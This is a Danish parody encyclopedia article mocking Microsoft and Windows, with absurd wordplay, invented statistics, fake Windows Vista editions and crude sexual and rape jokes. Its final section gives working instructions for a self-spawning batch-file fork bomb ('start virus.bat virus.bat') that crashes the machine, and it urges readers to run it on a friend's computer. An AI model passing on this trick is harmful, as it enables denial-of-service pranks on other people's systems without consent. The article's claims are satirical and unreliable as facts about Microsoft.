Microsoft

Fra Spademanns Leksikon, den både frie og sande virkelighed
Spring til navigation Spring til søgning

"DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS DEVELOPERS"

~ Steve Ballmer om det som Vista kunne ha' brugt nogle flere af
Microsoft lancerede i 1996 et tastatur optimeret til Windows 95

Microsoft er verdensomspændt verdensorganisations, der laver verdensklasses verdenscomputer verdensprogrammer. Microsofts verdensofficial verdensdanske verdensnavn er "VerdensMicrosoft", Microsoft har taget verdenspatent på "verdens-".

Microsoft lever af verdensborger og verdensidioter, som lever verdenspenge for deres verdensprogrammer, som er verdensdårlige. Verdensufatteligt nok, så kan verdensfolk godt lide deres verdensprogrammer.

Microsoft skulle rigtig have heddet Micro & Soft da firmaet er opkaldt efter Bill Gates pik.

VerdensWindows verdensserien[redigér]

VerdensWindows (kendt på verdensengelsk som Microsoft Windows) er et verdensoperativ verdenssystem, som er på over 1546% af alle verdenscomputere.

Windows 7[redigér]

Windows 7, er Microsofts nyeste verdensudgave, og dog også lidt dyr. Men den skulle efter sigende, være mindre indviklet end andre, men dette er dog noget vås da systemet har ubegribeligt irreterende tendenser til at blive påvirket af oldnordiske programmer, som den Nordiske Mytologis Guder Herre Odins Program og Projekt: Lad Mig Føde Børnene, Som bestod i at han ikke kun plyndrede men også voldtog personer hele tiden, ligsom vikinger. Det undre så derfor ikke forskere, at han mugligvis kan have taget fejl ved en af dem (måske hvis manden havde langt hår) og gennemknaldet personen. Eller også har forskerne igen taget fejl, og derfor ville pogrammet blive navngivet: Tretten Børn Og Et På Vej (Eller Flere!) Men nok om det, for Windows 7 påvirkes af disse såkaldet "oldnordiske" programmer, og går over til noget farve basic stads (der da aligevel ikke gøre noget slemt, eller ødelægger en skid i systemet elle computeren, det er absulut ikke noget slemt, og farligt og alvorligt, jeg havde bare lyst til at skrive et eller andent. LOL!)

 • Windows Vista - Udagve lige neden under den nyeste: Windows 7. Der var for mange problemer med Vista, da den hele tiden lukkede ned ved at sige Hasta La Vista baby.
 • Windows Vista One Proccess Edition - Ekstrem billig, men kan kun kører sig selv.
 • Windows Vista Compact Edition - For at spare på pengene, bruger den kun 5% af skærmen.
 • Windows Vista I Can't Believe It's Not Compact Edition - Det samme som den forrige, men én variable i systemet hedder noget andet (kommer nok til at koste syv tusind dadler ekstra end den forrige).
 • Windows Vista Unamed Edition - Næsten normalt version, men uden navngivet filer (har allerede meldt om mange problemmer med porn mapper).
 • Windows Vista MS-DOS Edition - Kommer uden grafisk engine, og kører udlukkende i teksttilstand.
 • Windows Vista XP - Windows Vista med et XP look.
 • Windows Vista Imperial Edition - Special version for imperier.
 • Windows Mac-edition - Total kopi af Mac OS X, men da dette gælder for alle Windows-versioner kan denne version IKKE anbefales! (Desuden har den en sådan pris at det kun er Bill Gates der har råd til den)
 • Windows Vista 7-Viser kun 7 taller i alle filer, og den koster 7gange så meget
 • Windows Vista You know the name - Kopi af Windows Vista og koster mere end dit hus, ja 10kroner
 • Flere versioner mangler at blive offentligt gjort.


Clippy.gif

Hasta la Vista, Billy Boy!

Det skal lige siges at Windows ikke engang kan bruge sit eget program Notepad (Notesblok) uden at crashe computeren og netværket! Gå ind i notepad og skriv:

start virus.bat virus.bat

Tryk nu "Gem som" og gem den inde under skrivebordet og kald filen for virus.bat gå nu hen til skrivebordet og åbne filen. Filen bliver nu ved med at åbne sig selv så mange gange at den chrasher P.S prøv det ikke på en skoles computer da du kan crashe netværket og så kommer du i problemer! Prøv dog på din vens computer!